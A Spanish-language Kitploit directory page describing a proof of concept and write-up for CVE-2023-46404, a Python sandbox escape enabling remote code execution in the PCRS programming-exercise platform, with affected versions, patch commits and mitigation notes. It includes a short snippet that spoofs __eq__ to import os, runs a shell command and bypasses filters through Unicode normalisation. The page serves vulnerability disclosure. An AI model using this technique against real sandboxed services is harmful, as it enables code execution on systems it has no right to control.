Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-46404 — PoC y Writeup para CVE-2023-46404. | Kitploit
Herramientas/GitHubGitHub/windecks/cve-2023-46404
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPapers e InvestigaciónAprendizaje y Educación
GitHubwindecks/cve-2023-46404

CVE-2023-46404

PoC y Writeup para CVE-2023-46404.

Ver Repositorio
3hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-46404

PCRS es una aplicación web para ejercicios de programación en línea desarrollada en la Universidad de Toronto. Ver repositorio de Bitbucket: https://bitbucket.org/utmandrew/pcrs/src/3.11/

Resumen

La página “Questions” de PCRS, con envío de código, y la página “Code editor” son vulnerables a la ejecución remota de código (RCE) al escapar del sandboxing de Python.

Detalles

La ejecución remota de código se puede lograr en instancias de PCRS mediante el uso de objetos generador. Al utilizar marcos de generador (gi_frame) y f_back, los scripts pueden salir de un marco de pila sandbox y ejecutar código malicioso en un entorno sin sandbox. Además, la normalización Unicode puede evadir fácilmente la sanitización básica de entradas. Cualquier usuario autenticado con privilegios mínimos puede realizar este ataque. Consulte el PoC para más detalles.

Versiones afectadas conocidas

  • PCRS <= 3.11 d0de1e con ejecución de Python.
  • Parche implementado en 9326ad3 con mitigación parcial en fbaedd3.

Mitigación

Crear mecanismos de aislamiento seguros desde cero es propenso a descuidos y vulnerabilidades. Como siempre, es mejor aislar un entorno de ejecución que un lenguaje.

Extra

Sobrescribir __eq__ puede usarse en un entorno restringido:

root@kitploit:~
def f():
    mod_name = "os"
    fake_name = "json"
    os = __import__(type("s", (str,), {"__eq__": lambda x, y: y == fake_name or y == mod_name, "__hash__": lambda x: hash(mod_name)})(mod_name))
    os.system("id > /tmp/test.txt")
    s = ᵒpen("/tmp/test.txt").read() # unicode normalization of the "open" function
    os.system("rm /tmp/test.txt")
    return s
Descargar herramienta